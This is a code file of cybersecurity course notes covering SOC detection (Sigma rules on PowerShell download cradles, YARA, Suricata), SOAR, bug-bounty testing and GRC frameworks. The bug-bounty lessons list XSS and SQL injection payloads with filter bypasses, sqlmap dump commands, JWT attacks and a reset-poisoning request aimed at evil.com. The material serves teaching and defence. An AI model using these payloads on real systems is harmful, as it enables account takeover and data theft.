- Multiple simultaneous sessions
\`\`\`

## Network Anomalies

\`\`\`text
Traffic volume:
- Baseline per-host bandwidth → Alert on spikes
- Normal protocols → Alert on unusual protocols
- Expected destinations → Alert on new external IPs

DNS anomalies:
- High entropy domain names (DGA detection)
- Excessive queries to single domain
- TXT record queries (data exfil)
- Queries to newly registered domains

Beaconing:
- Regular periodic connections (C2 heartbeat)
- Consistent packet sizes
- Connections to non-standard ports
\`\`\`

## Statistical Methods

- **Standard deviation**: Flag values >3σ from the mean
- **Frequency analysis**: Rare events in common fields
- **Peer group analysis**: Compare user to similar users
- **Time series**: Detect periodic patterns (beaconing)`,

  "soc-hunting-playbooks": `## Hunting Playbooks & Documentation

Document hunts for repeatability and convert findings into detections.

## Playbook Structure

\`\`\`text
=== HUNT PLAYBOOK: Credential Dumping ===

HYPOTHESIS: Attackers may be using tools to dump credentials from LSASS

ATT&CK: T1003.001 (OS Credential Dumping: LSASS Memory)

DATA SOURCES:
- Sysmon (Event 10: ProcessAccess)
- Windows Security (Event 4688: Process Creation)
- EDR telemetry

QUERIES:
[Include specific SIEM queries]

ANALYSIS STEPS:
1. Run ProcessAccess query targeting lsass.exe
2. Filter out known-good processes (AV, EDR agents)
3. Check remaining processes against known dump tools
4. Investigate: user, host, timeline, related activity

EXPECTED FALSE POSITIVES:
- Antivirus scanning lsass.exe
- Windows Defender
- Crash dump utilities

RESPONSE ACTIONS:
- If confirmed: Isolate host, reset compromised credentials
- Preserve memory dump for forensics
- Check for lateral movement from affected host

LAST RUN: 2026-03-01 | FINDINGS: 0 true positives
NEXT RUN: 2026-04-01
\`\`\`

## Converting Hunts to Detections

When a hunt finds something, create a permanent detection:

1. Write a Sigma rule for the finding
2. Test against historical data for false positive rate
3. Set appropriate severity and response actions
4. Deploy to SIEM and add to runbook`,

  // ═══════════════════════════════════════════
  // SOC ANALYST — Detection Engineering
  // ═══════════════════════════════════════════

  "soc-sigma-rules": `## Sigma Rules & Detection-as-Code

Sigma enables portable, version-controlled detection rules.

## Sigma Rule Structure

\`\`\`yaml
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b9d2-2b06f0ffa2f2
status: production
description: Detects PowerShell download cradle execution
author: SOC Team
date: 2026/03/17
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\\\\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'iwr'
    filter:
        User: 'SYSTEM'
        ParentImage|endswith: '\\\\sccm.exe'
    condition: selection and not filter
falsepositives:
    - Legitimate admin scripts
    - Software deployment tools
level: high
\`\`\`

## Converting Sigma to SIEM Queries

\`\`\`bash
# Install sigmac/sigma-cli
pip install sigma-cli

# Convert to Splunk
sigma convert -t splunk rule.yml

# Convert to Elastic
sigma convert -t elasticsearch rule.yml

# Convert to QRadar
sigma convert -t qradar rule.yml
\`\`\`

## Detection-as-Code Workflow

1. Write Sigma rule in Git repository
2. Peer review via pull request
3. Test against historical data
4. Deploy to SIEM via CI/CD pipeline
5. Monitor false positive rate
6. Iterate and improve`,

  "soc-yara-rules": `## YARA Rules for Malware Detection

YARA identifies malware based on textual or binary patterns.

## YARA Rule Structure

\`\`\`yara
rule Emotet_Loader {
    meta:
        author = "SOC Team"
        description = "Detects Emotet loader variants"
        date = "2026-03-17"
        severity = "high"

    strings:
        $s1 = "RunDLL32" ascii wide
        $s2 = {6A 40 68 00 30 00 00}  // hex pattern
        $s3 = /regsvr32\\.exe.*/i      // regex
        $api1 = "VirtualAlloc" ascii
        $api2 = "WriteProcessMemory" ascii
        $api3 = "CreateRemoteThread" ascii

    condition:
        uint16(0) == 0x5A4D and  // MZ header (PE file)
        filesize < 500KB and
        ($s1 or $s2) and
        2 of ($api*)
}
\`\`\`

## Writing Effective Rules

- **Start broad, then narrow**: Begin with loose patterns, add conditions to reduce FPs
- **Use hex patterns** for shellcode and encoded payloads
- **Combine conditions**: String matches + file properties + structure checks
- **Test thoroughly**: Run against known-good files to verify no false positives

## Deployment

\`\`\`bash
# Scan a file
yara rules.yar suspicious_file.exe

# Scan a directory
yara -r rules.yar /path/to/scan/

# Scan with process memory
yara -p 20 rules.yar  # Scan running processes
\`\`\``,

  "soc-network-detection": `## Network Detection with Suricata

Write and manage IDS/IPS rules for network-based threat detection.

## Suricata Rule Syntax

\`\`\`text
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"ET MALWARE Trickbot CnC Beacon";
    flow:established,to_server;
    content:"POST"; http_method;
    content:"/group/"; http_uri;
    content:"Connection: Keep-Alive"; http_header;
    pcre:"/\\/group\\/[a-z0-9]{5,15}\\//Ui";
    classtype:trojan-activity;
    sid:2028000; rev:1;
)
\`\`\`

## Rule Components

- **Action**: alert, drop, pass, reject
- **Protocol**: tcp, udp, http, dns, tls, ssh
- **Direction**: → (one-way) or <> (bidirectional)
- **Content match**: String or hex patterns in payload
- **Flow**: Connection state (established, to_server)
- **Metadata**: Classification, severity, reference

## Common Detection Scenarios

\`\`\`text
# Detect DNS tunneling (long subdomains)
alert dns any any -> any any (
    msg:"Possible DNS Tunneling";
    dns.query; content:"."; offset:50;
    threshold: type both, track by_src, count 10, seconds 60;
    sid:3000001; rev:1;
)

# Detect TLS to known-bad certificate
alert tls any any -> any any (
    msg:"TLS connection to suspicious cert";
    tls.cert_subject; content:"CN=evil.com";
    sid:3000002; rev:1;
)
\`\`\``,

  "soc-detection-testing": `## Detection Testing & Validation

Ensure your detections actually work by testing them against real attack simulations.

## Atomic Red Team

\`\`\`bash
# Install Invoke-AtomicRedTeam
Install-Module -Name invoke-atomicredteam

# List available tests for a technique
Invoke-AtomicTest T1059.001 -ShowDetails

# Execute a specific test
Invoke-AtomicTest T1059.001 -TestNumbers 1

# Clean up after test
Invoke-AtomicTest T1059.001 -TestNumbers 1 -Cleanup
\`\`\`

## Testing Workflow

\`\`\`text
1. SELECT technique to test (from ATT&CK)
2. VERIFY detection rule exists for this technique
3. EXECUTE atomic test in controlled environment
4. CHECK if SIEM alert fired
5. VALIDATE alert contains expected information
6. DOCUMENT results (detected/not detected, time to detect)
7. FIX gaps if detection failed
8. RE-TEST to confirm fix works
\`\`\`

## Coverage Tracking

\`\`\`text
ATT&CK Technique Coverage Matrix:
T1059.001 (PowerShell)     → Detected ✓ (Rule: SIG-001)
T1003.001 (LSASS Dump)     → Detected ✓ (Rule: SIG-042)
T1053.005 (Scheduled Task) → NOT DETECTED ✗ → Action: Write rule
T1021.001 (RDP)            → Partial ⚠ (Only detects external)
\`\`\`

## Purple Team Exercises

- Red team executes techniques while blue team monitors
- Immediate feedback loop: "Did you see that?"
- Document all gaps and remediation actions
- Re-test until all planned techniques are detected`,

  // ═══════════════════════════════════════════
  // SOC ANALYST — SOAR & Automation
  // ═══════════════════════════════════════════

  "soc-soar-intro": `## SOAR Fundamentals

Security Orchestration, Automation, and Response platforms automate repetitive SOC tasks.

## What SOAR Does

\`\`\`text
ORCHESTRATION: Connect and coordinate tools
  SIEM ↔ EDR ↔ Firewall ↔ Ticketing ↔ Threat Intel

AUTOMATION: Execute tasks without human intervention
  IP lookup → Hash check → User enrichment → Alert enrichment

RESPONSE: Take action based on analysis
  Block IP → Isolate host → Disable account → Create ticket
\`\`\`

## Key Use Cases

1. **Alert enrichment**: Automatically look up IPs, domains, hashes
2. **Phishing response**: Extract IOCs, block, notify users
3. **Malware containment**: Isolate host, kill process, block hash
4. **User access**: Disable compromised accounts, reset passwords
5. **Reporting**: Generate incident reports, update dashboards

## Popular SOAR Platforms

- **Cortex XSOAR (Palo Alto)**: Enterprise-grade, extensive integrations
- **Shuffle**: Open-source, workflow-based automation
- **TheHive + Cortex**: Open-source case management + automation
- **Splunk SOAR (Phantom)**: Integrated with Splunk ecosystem
- **Microsoft Sentinel**: Cloud-native SOAR for Azure environments

## ROI of SOAR

- Reduce MTTR by 80%+ for automated playbooks
- Handle 10x more alerts without hiring
- Ensure consistent response (no steps missed)
- Free analysts for complex investigations`,

  "soc-playbook-dev": `## Playbook Development

Automated response playbooks ensure consistent, complete, and fast incident handling.

## Playbook Design Process

\`\`\`text
1. IDENTIFY: Which alert type needs automation?
   → Choose high-volume, well-defined alert types

2. MAP WORKFLOW: Document the manual steps
   → What does an analyst do today?

3. IDENTIFY AUTOMATABLE STEPS: Which steps can be automated?
   → Enrichment: Almost always
   → Analysis: Partially (rule-based decisions)
   → Response: Cautiously (start with low-risk actions)

4. BUILD: Implement in SOAR platform
   → Start simple, add complexity over time

5. TEST: Validate with test data
   → Run against known-good and known-bad scenarios

6. DEPLOY: Monitor and refine
   → Track success rate, FP rate, time savings
\`\`\`

## Example: Phishing Playbook

\`\`\`text
TRIGGER: Phishing alert from email gateway

1. EXTRACT IOCs
   → Sender email, domain, IP
   → URLs in email body
   → Attachment hashes

2. ENRICH
   → Check sender in threat intel (VirusTotal, AbuseIPDB)
   → Check URLs (URLScan.io, Google Safe Browsing)
   → Check hashes (VirusTotal, Hybrid Analysis)

3. ANALYZE (Decision point)
   → IF all IOCs clean AND sender reputation good → Close as FP
   → IF any IOC malicious → Continue to response

4. RESPOND
   → Block sender domain in email gateway
   → Block malicious URLs in proxy/firewall
   → Search for all recipients who received the email
   → Check proxy logs: did anyone click?
   → If clicked: isolate endpoint, scan for malware
   → Notify affected users

5. CLOSE
   → Create incident ticket with full timeline
   → Update IOC blocklists
   → Send metrics to dashboard
\`\`\``,

  "soc-api-integration": `## API Integrations & Enrichment

Connecting SOC tools via APIs enables automated enrichment and response.

## Common Integrations

\`\`\`python
# VirusTotal IP reputation check
import requests

def check_ip_vt(ip, api_key):
    url = f"https://www.virustotal.com/api/v3/ip_addresses/{ip}"
    headers = {"x-apikey": api_key}
    response = requests.get(url, headers=headers)
    data = response.json()
    stats = data["data"]["attributes"]["last_analysis_stats"]
    return {
        "malicious": stats.get("malicious", 0),
        "suspicious": stats.get("suspicious", 0),
        "reputation": data["data"]["attributes"].get("reputation", 0)
    }

# AbuseIPDB check
def check_ip_abuse(ip, api_key):
    url = "https://api.abuseipdb.com/api/v2/check"
    headers = {"Key": api_key, "Accept": "application/json"}
    params = {"ipAddress": ip, "maxAgeInDays": 90}
    response = requests.get(url, headers=headers, params=params)
    data = response.json()["data"]
    return {
        "abuse_confidence": data["abuseConfidenceScore"],
        "total_reports": data["totalReports"],
        "country": data["countryCode"]
    }
\`\`\`

## Enrichment Pipeline

\`\`\`text
Alert received → Extract IOCs
  IP addresses → VirusTotal, AbuseIPDB, Shodan, GeoIP
  Domains → VirusTotal, URLScan, WHOIS, passive DNS
  File hashes → VirusTotal, Hybrid Analysis, MalwareBazaar
  Emails → Have I Been Pwned, email reputation
  User accounts → AD lookup, recent activity, risk score
\`\`\`

## Building Custom Integrations

- Use Python requests library for REST APIs
- Handle rate limiting (sleep between requests)
- Cache results to avoid redundant lookups
- Log all API calls for audit trail`,

  "soc-metrics-reporting": `## SOC Metrics & Reporting

Measuring SOC performance drives improvement and demonstrates value to leadership.

## Key Performance Indicators

\`\`\`text
DETECTION METRICS
├── MTTD (Mean Time to Detect): Target <1 hour
├── Detection coverage: % ATT&CK techniques covered
├── Alert volume: Total alerts per day/week
├── True positive rate: TP / (TP + FP)
└── Detection rule count: Active vs disabled

RESPONSE METRICS
├── MTTR (Mean Time to Respond): Target <4 hours
├── MTTC (Mean Time to Contain): Target <1 hour
├── Incidents per analyst: Workload distribution
├── Escalation rate: % L1→L2→L3
└── Reopened incidents: Quality indicator

OPERATIONAL METRICS
├── Alert backlog: Unreviewed alerts
├── SLA compliance: % alerts handled within SLA
├── Analyst utilization: Productive time ratio
├── Tool uptime: SIEM, EDR, SOAR availability
└── Training hours: Per analyst per quarter
\`\`\`

## Reporting Cadence

- **Daily**: Shift handoff report (active incidents, queue status)
- **Weekly**: Operational summary (volumes, trends, notable events)
- **Monthly**: Performance report (KPIs, improvements, staffing)
- **Quarterly**: Executive summary (risk posture, investment needs)

## Dashboard Design

\`\`\`text
SOC Operations Dashboard:
┌──────────────┬──────────────┬──────────────┐
│ Alerts Today │ Open Cases   │ MTTR         │
│    247       │     12       │   3.2 hrs    │
├──────────────┴──────────────┴──────────────┤
│ Alert Trend (7-day sparkline)              │
│ ▁▃▅▇▆▄▃                                   │
├────────────────────────────────────────────┤
│ Top Alert Types    │ Analyst Workload      │
│ 1. Malware (42%)  │ Alice: 8 cases        │
│ 2. Phishing (28%) │ Bob: 6 cases          │
│ 3. Brute Force    │ Carol: 5 cases        │
└────────────────────┴───────────────────────┘
\`\`\``,

  // ═══════════════════════════════════════════
  // BUG BOUNTY — Missing lesson notes
  // ═══════════════════════════════════════════

  "bb-recon-intro": `## Bug Bounty Methodology Overview

Bug bounty hunting is the practice of finding and responsibly disclosing security vulnerabilities in exchange for rewards. Understanding the full lifecycle is essential before you start hacking.

## The Bug Bounty Lifecycle
1. **Choose a Program** — Pick a target on HackerOne, Bugcrowd, or Intigriti
2. **Read the Scope** — Understand what's in-scope and out-of-scope
3. **Reconnaissance** — Map the attack surface (subdomains, endpoints, tech stack)
4. **Vulnerability Discovery** — Test for common and uncommon bugs
5. **Exploitation** — Prove impact with a working proof-of-concept
6. **Report Writing** — Document clearly with steps to reproduce
7. **Disclosure** — Submit and communicate with the security team

## Choosing Your First Program
- Start with programs that have a **wide scope** (*.example.com)
- Look for programs with **fast response times** and good reputation
- Avoid programs with very narrow scope or only specific endpoints
- VDPs (Vulnerability Disclosure Programs) are great for building reputation

## Key Platforms
| Platform | Best For |
|----------|----------|
| **HackerOne** | Largest platform, enterprise programs |
| **Bugcrowd** | Good starter programs, university |
| **Intigriti** | European programs, great community |
| **YesWeHack** | European alternative, government programs |

## Essential Mindset
- **Think like a developer** — understand how features are built
- **Automate repetitive tasks** — save manual effort for creative testing
- **Be persistent** — most hunters find nothing on their first 10 targets
- **Stay ethical** — never access data you shouldn't, never test out of scope
- **Document everything** — take screenshots, save requests, log your process`,

  "bb-js-analysis": `## JavaScript & API Endpoint Analysis

JavaScript files are goldmines for bug bounty hunters. They contain API endpoints, secrets, authentication logic, and internal functionality that developers never intended to be public.

## What to Look For in JS Files
- **API endpoints** — \`/api/v1/admin/users\`, \`/internal/debug\`
- **Hardcoded secrets** — API keys, tokens, credentials
- **Hidden parameters** — Query params, POST body fields
- **Authentication logic** — How tokens are generated/validated
- **Business logic** — Discount calculations, role checks
- **Comments** — TODO notes, debug flags, developer notes

## Tools for JS Analysis
\`\`\`bash
# LinkFinder — extract endpoints from JS files
python3 linkfinder.py -i https://target.com/app.js -o cli

# SecretFinder — find secrets in JS
python3 SecretFinder.py -i https://target.com/app.js -o cli

# JSLuice — fast JS analysis
cat urls.txt | jsluice urls

# Katana — crawl and extract JS
katana -u https://target.com -jc -d 3
\`\`\`

## Manual Analysis Techniques
1. **View Source** — Right-click → View Page Source, search for \`api\`, \`token\`, \`key\`
2. **Browser DevTools** — Network tab → filter by JS → read responses
3. **Source Maps** — Look for \`.js.map\` files that reveal original source code
4. **Webpack chunks** — Modern apps split code into chunks, check all of them

## Common Findings
- **Exposed admin endpoints** — \`/api/admin/\` accessible without auth
- **API keys in client code** — AWS keys, Stripe keys, internal service tokens
- **Debug endpoints** — \`/debug\`, \`/status\`, \`/healthcheck\` with sensitive info
- **Hardcoded credentials** — Test/staging credentials left in production
- **Hidden features** — Feature flags, beta endpoints, internal tools`,

  "bb-xss": `## Cross-Site Scripting (XSS)

XSS allows attackers to inject malicious scripts into web pages viewed by other users. It remains one of the most common web vulnerabilities and a staple of bug bounty programs.

## Types of XSS
### Reflected XSS
User input is immediately reflected in the response without sanitization.
\`\`\`
https://target.com/search?q=<script>alert(document.cookie)</script>
\`\`\`

### Stored XSS
Malicious input is saved to the database and rendered to other users.
\`\`\`
Profile bio: <img src=x onerror=alert(1)>
Comment field: <svg onload=alert(document.domain)>
\`\`\`

### DOM-based XSS
The vulnerability exists in client-side JavaScript that processes user input.
\`\`\`javascript
// Vulnerable code
document.getElementById('output').innerHTML = location.hash.slice(1);
// Exploit: https://target.com/#<img src=x onerror=alert(1)>
\`\`\`

## XSS Payloads Cheat Sheet
\`\`\`html
<!-- Basic -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

<!-- Filter bypass -->
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror="alert(1)">
<details open ontoggle=alert(1)>

<!-- Without parentheses -->
<img src=x onerror=alert\`1\`>
<svg onload=alert&lpar;1&rpar;>

<!-- Encoding bypasses -->
<img src=x onerror=\\u0061lert(1)>
\`\`\`

## Impact Demonstration
- **Session hijacking** — Steal cookies: \`document.cookie\`
- **Keylogging** — Capture keystrokes on the page
- **Phishing** — Inject fake login forms
- **Account takeover** — Change email/password via API calls
- **Defacement** — Modify page content

## Testing Methodology
1. Identify all input reflection points
2. Test with a canary string: \`"><img src=x>\`
3. Check which characters are filtered/encoded
4. Craft a payload that bypasses the filter
5. Demonstrate impact (don't just pop alert)`,

  "bb-sqli": `## SQL Injection in Modern Applications

SQL injection occurs when user input is incorporated into SQL queries without proper sanitization. Despite being well-known, it still appears in bug bounty programs, especially in legacy code and lesser-tested endpoints.

## Detection Techniques
\`\`\`
# Error-based detection
?id=1'           → SQL error = vulnerable
?id=1' OR '1'='1  → Different response = vulnerable
?id=1 AND 1=1    → Same response
?id=1 AND 1=2    → Different response = vulnerable

# Time-based blind detection
?id=1' AND SLEEP(5)--     → 5 second delay = vulnerable
?id=1'; WAITFOR DELAY '0:0:5'--  → MSSQL variant
\`\`\`

## Exploitation with SQLMap
\`\`\`bash
# Basic scan
sqlmap -u "https://target.com/page?id=1" --batch

# With cookies/headers
sqlmap -u "https://target.com/api" --cookie="session=abc123" --headers="X-Token: xyz"

# POST request
sqlmap -u "https://target.com/login" --data="user=admin&pass=test" -p user

# Enumerate databases
sqlmap -u "https://target.com/page?id=1" --dbs
sqlmap -u "https://target.com/page?id=1" -D dbname --tables
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump
\`\`\`

## Modern SQLi Locations
- **Search functionality** — Full-text search often uses raw queries
- **Sorting/ordering** — \`ORDER BY\` clauses are hard to parameterize
- **Filtering** — Complex filter logic may concatenate SQL
- **Import/export** — CSV/XML processing with database operations
- **GraphQL** — Resolvers that build raw queries
- **API parameters** — JSON/XML body parameters

## WAF Bypass Techniques
\`\`\`sql
-- Comment injection
1'/**/UNION/**/SELECT/**/1,2,3--

-- Case variation
1' uNiOn SeLeCt 1,2,3--

-- URL encoding
1%27%20UNION%20SELECT%201%2C2%2C3--

-- Inline comments (MySQL)
1'/*!UNION*//*!SELECT*/1,2,3--
\`\`\`

## Impact & Reporting
- Always demonstrate the **minimum viable impact**
- Show you can read data (don't dump entire databases)
- Mention potential for data modification/deletion
- Note if the database user has elevated privileges`,

  "bb-auth-vulns": `## Authentication & Session Attacks

Authentication vulnerabilities are among the highest-impact findings in bug bounty. Breaking auth means account takeover, which platforms reward generously.

## Common Authentication Flaws

### Password Reset Poisoning
\`\`\`http
POST /forgot-password HTTP/1.1
Host: evil.com
X-Forwarded-Host: evil.com

email=victim@example.com
\`\`\`
The reset link is generated using the Host header → points to attacker's server.

### JWT Vulnerabilities
\`\`\`bash
# Algorithm confusion — change RS256 to HS256
# The server's public key becomes the HMAC secret
python3 jwt_tool.py <token> -X a

# None algorithm
python3 jwt_tool.py <token> -X n

# Key confusion
python3 jwt_tool.py <token> -X k -pk public.pem
\`\`\`

### OAuth Flaws
- **Open redirect in redirect_uri** — Steal authorization codes
- **Missing state parameter** — CSRF on OAuth flow
- **Token leakage** — Authorization code in referrer header
- **Scope escalation** — Request higher privileges than granted

### Session Management
- **Session fixation** — Force a known session ID before login
- **Insufficient expiry** — Sessions that never expire
- **Missing invalidation** — Old sessions valid after password change
- **Predictable tokens** — Sequential or time-based session IDs

## Testing Checklist
1. Test password reset flow for host header injection
2. Check JWT for algorithm confusion attacks
3. Test OAuth redirect_uri for open redirects
4. Verify session invalidation on password change
5. Check for rate limiting on login endpoints
6. Test 2FA bypass (backup codes, race conditions)
7. Look for credential stuffing protection
8. Test "remember me" token security

## Account Takeover Chains
- Password reset + open redirect = token theft
- XSS + session cookie = session hijacking
- IDOR on email change + no re-auth = ATO
- OAuth misconfiguration + social login = ATO`,

  "bb-automation": `## Bug Bounty Automation & Custom Tooling

Automation separates part-time hunters from full-time professionals. Build pipelines that continuously monitor targets while you focus on creative manual testing.

## Recon Automation Pipeline
\`\`\`bash
#!/bin/bash
# Automated recon pipeline
DOMAIN=$1
OUTPUT="recon/$DOMAIN"
mkdir -p $OUTPUT

# Step 1: Subdomain enumeration
echo "[*] Enumerating subdomains..."
subfinder -d $DOMAIN -o $OUTPUT/subs.txt
amass enum -passive -d $DOMAIN >> $OUTPUT/subs.txt
sort -u $OUTPUT/subs.txt -o $OUTPUT/subs.txt

# Step 2: Resolve live hosts
echo "[*] Resolving hosts..."
httpx -l $OUTPUT/subs.txt -o $OUTPUT/live.txt -sc -td -title

# Step 3: Screenshot
echo "[*] Taking screenshots..."
gowitness file -f $OUTPUT/live.txt -P $OUTPUT/screenshots/

# Step 4: Port scanning
echo "[*] Scanning ports..."
naabu -l $OUTPUT/subs.txt -p - -o $OUTPUT/ports.txt

# Step 5: Content discovery
echo "[*] Fuzzing directories..."
cat $OUTPUT/live.txt | xargs -I{} ffuf -u {}/FUZZ -w wordlist.txt -o $OUTPUT/fuzz_{}.json
\`\`\`

## Nuclei for Vulnerability Scanning
\`\`\`bash
# Scan with all templates
nuclei -l live.txt -t nuclei-templates/

# Specific vulnerability classes
nuclei -l live.txt -t cves/ -severity critical,high
nuclei -l live.txt -t exposures/ -t misconfigurations/

# Custom template
nuclei -l live.txt -t my-templates/custom-check.yaml

# Rate-limited scanning
nuclei -l live.txt -rl 50 -c 10 -t nuclei-templates/
\`\`\`

## Writing Custom Nuclei Templates
\`\`\`yaml
id: custom-api-key-exposure
info:
  name: API Key Exposure
  severity: high
  
requests:
  - method: GET
    path:
      - "{{BaseURL}}/config.js"
      - "{{BaseURL}}/env.js"
    matchers:
      - type: regex
        regex:
          - "api[_-]?key['\\"\\s]*[:=]['\\"\\s]*[a-zA-Z0-9]{20,}"
\`\`\`

## Continuous Monitoring
- **Subdomain monitoring** — Run subfinder daily, diff results
- **GitHub dorking** — Monitor for leaked credentials
- **Certificate transparency** — Watch for new subdomains via CT logs
- **Wayback Machine** — Check archived endpoints periodically
- **Notify** — Use ProjectDiscovery's notify for alerts`,

  // ═══════════════════════════════════════════
  // GRC — Missing lesson notes
  // ═══════════════════════════════════════════

  "grc-nist-intro": `## NIST Cybersecurity Framework (CSF)

The NIST Cybersecurity Framework provides a structured approach to managing cybersecurity risk. It's widely adopted across industries and serves as the foundation for many security programs.

## The Five Core Functions

### 1. Identify (ID)
Develop understanding of your environment to manage cybersecurity risk.
- **Asset Management** — Inventory all hardware, software, data
- **Business Environment** — Understand mission, objectives, dependencies
- **Governance** — Policies, procedures, and legal requirements
- **Risk Assessment** — Identify threats and vulnerabilities
- **Risk Management Strategy** — Define risk tolerance

### 2. Protect (PR)
Implement safeguards to ensure delivery of critical services.
- **Access Control** — Manage identities and permissions
- **Awareness Training** — Security education for all users
- **Data Security** — Encryption, DLP, backups
- **Protective Technology** — Firewalls, IDS/IPS, endpoint protection

### 3. Detect (DE)
Define activities to identify cybersecurity events.
- **Anomalies & Events** — Baseline behavior, detect deviations
- **Continuous Monitoring** — SIEM, log analysis, network monitoring
- **Detection Processes** — Roles, responsibilities, testing

### 4. Respond (RS)
Take action regarding detected cybersecurity incidents.
- **Response Planning** — Incident response procedures
- **Communications** — Internal and external notification
- **Analysis** — Investigate and understand the incident
- **Mitigation** — Contain and eradicate the threat
- **Improvements** — Update plans based on lessons learned

### 5. Recover (RC)
Maintain plans for resilience and restore capabilities.
- **Recovery Planning** — Documented recovery procedures
- **Improvements** — Update recovery strategies
- **Communications** — Coordinate restoration activities

## NIST CSF 2.0 Updates
- Added **Govern** as a sixth core function
- Expanded supply chain risk management
- Improved guidance for small/medium businesses
- Better integration with other NIST publications

## Implementation Tiers
| Tier | Name | Description |
|------|------|-------------|
| 1 | Partial | Ad hoc, reactive |
| 2 | Risk Informed | Approved but not org-wide |
| 3 | Repeatable | Formal, consistent |
| 4 | Adaptive | Continuous improvement |`,

  "grc-soc2-pci": `## SOC 2 & PCI-DSS Compliance

### SOC 2 Trust Service Criteria

SOC 2 evaluates service organizations against five Trust Service Criteria (TSC):

#### 1. Security (Common Criteria)
The system is protected against unauthorized access.
- Firewalls, IDS/IPS, access controls
- Encryption in transit and at rest
- Vulnerability management and patching

#### 2. Availability
The system is available for operation and use.
- Uptime SLAs and monitoring
- Disaster recovery and business continuity
- Capacity planning and performance monitoring

#### 3. Processing Integrity
System processing is complete, valid, accurate, and timely.
- Input validation and error handling
- Quality assurance processes
- Data reconciliation

#### 4. Confidentiality
Information designated as confidential is protected.
- Data classification schemes
- Encryption and access restrictions
- Secure data disposal

#### 5. Privacy
Personal information is collected, used, retained, and disclosed properly.
- Privacy notices and consent
- Data minimization
- Right to access, correct, and delete

### SOC 2 Report Types
- **Type I** — Controls are designed properly at a point in time
- **Type II** — Controls operate effectively over a period (6-12 months)

### PCI-DSS Requirements
PCI-DSS has 12 core requirements for handling cardholder data:

\`\`\`
1.  Install and maintain network security controls
2.  Apply secure configurations to all components
3.  Protect stored account data
4.  Protect cardholder data with strong cryptography during transmission
5.  Protect all systems against malware
6.  Develop and maintain secure systems and software
7.  Restrict access to system components by business need-to-know
8.  Identify users and authenticate access
9.  Restrict physical access to cardholder data
10. Log and monitor all access to network resources
11. Test security of systems and networks regularly
12. Support information security with organizational policies
\`\`\`

### Key Differences
| Aspect | SOC 2 | PCI-DSS |
|--------|-------|---------|
| **Scope** | Any service org | Payment card handling |
| **Mandatory** | Voluntary | Required for card processing |
| **Audit** | Annual | Annual + quarterly scans |
| **Focus** | Trust principles | Cardholder data protection |`,

  "grc-risk-fundamentals": `## Risk Assessment Fundamentals

Risk assessment is the systematic process of identifying, analyzing, and evaluating risks to an organization's information assets.

## Key Concepts
- **Threat** — Any potential cause of an unwanted incident (e.g., hackers, natural disasters)
- **Vulnerability** — A weakness that can be exploited (e.g., unpatched software)
- **Risk** — The probability of a threat exploiting a vulnerability × the impact
- **Control** — A measure that reduces risk (e.g., firewalls, policies)

## Risk Formula
\`\`\`
Risk = Likelihood × Impact

Where:
  Likelihood = Threat Probability × Vulnerability Severity
  Impact = Financial + Operational + Reputational damage
\`\`\`

## Risk Assessment Process
### 1. Asset Identification
- What are we protecting? (data, systems, people)
- What is the value of each asset?
- Who are the asset owners?

### 2. Threat Identification
- **External**: Hackers, nation-states, competitors
- **Internal**: Disgruntled employees, accidental errors
- **Environmental**: Floods, fires, power outages
- **Supply chain**: Third-party breaches, vendor failures

### 3. Vulnerability Assessment
- Automated scanning (Nessus, Qualys, Rapid7)
- Manual penetration testing
- Configuration reviews
- Code analysis

### 4. Likelihood Assessment
| Rating | Description | Frequency |
|--------|-------------|-----------|
| 5 - Almost Certain | Expected to occur | Multiple times/year |
| 4 - Likely | Will probably occur | Once per year |
| 3 - Possible | Might occur | Once in 2-3 years |
| 2 - Unlikely | Could occur | Once in 5-10 years |
| 1 - Rare | May only occur exceptionally | Once in 10+ years |

### 5. Impact Assessment
| Rating | Description | Financial Impact |
|--------|-------------|-----------------|
| 5 - Critical | Business survival at risk | >$10M |
| 4 - Major | Significant disruption | $1M-$10M |
| 3 - Moderate | Notable impact | $100K-$1M |
| 2 - Minor | Limited impact | $10K-$100K |
| 1 - Negligible | Minimal impact | <$10K |

## Risk Matrix
\`\`\`
Impact →     1    2    3    4    5
Likelihood
    5        5   10   15   20   25
    4        4    8   12   16   20
    3        3    6    9   12   15
    2        2    4    6    8   10
    1        1    2    3    4    5

1-4: Low | 5-9: Medium | 10-16: High | 17-25: Critical
\`\`\``,

  "grc-vendor-risk": `## Third-Party & Vendor Risk Management

Organizations increasingly rely on vendors and third parties, creating supply chain risks that must be systematically managed.

## Why Vendor Risk Matters
- **60%+ of breaches** involve a third-party component
- Vendors often have access to sensitive data or systems
- Regulatory requirements extend to third-party handling of data
- A vendor's breach is effectively your breach

## Vendor Risk Assessment Process

### 1. Vendor Inventory & Classification
\`\`\`
Tier 1 (Critical): Direct access to sensitive data/systems
  → Full security assessment, annual audit
  
Tier 2 (Important): Limited access, business-critical services
  → Security questionnaire, periodic review

Tier 3 (Low Risk): No data access, replaceable services
  → Basic due diligence, contract review
\`\`\`

### 2. Due Diligence Questions
- Do you have SOC 2 Type II or ISO 27001 certification?
- How do you handle data encryption (at rest and in transit)?
- What is your incident response and breach notification process?
- Do you conduct regular penetration testing?
- How do you manage employee access and offboarding?
- What is your data retention and disposal policy?
- Do you have cyber insurance?

### 3. Contractual Controls
- **Data Processing Agreements (DPA)** — Required under GDPR
- **Right to Audit** — Ability to assess vendor security
- **Breach Notification** — Mandatory notification timeframes (e.g., 72 hours)
- **Data Return/Destruction** — What happens when the contract ends
- **Subcontractor Controls** — Restrictions on fourth-party sharing
- **Insurance Requirements** — Minimum cyber insurance coverage

### 4. Continuous Monitoring
- **Security ratings** — Use BitSight, SecurityScorecard, UpGuard
- **Breach monitoring** — Track vendor breach disclosures
- **Financial health** — Monitor for bankruptcy/instability risk
- **Compliance status** — Verify ongoing certifications

## Key Frameworks
- **NIST SP 800-161** — Supply Chain Risk Management
- **ISO 27036** — Information Security for Supplier Relationships
- **SIG (Standardized Information Gathering)** — Vendor assessment questionnaire`,

  "grc-policy-writing": `## Security Policy Development

Security policies establish the rules, expectations, and responsibilities for protecting an organization's information assets.

## Policy Hierarchy
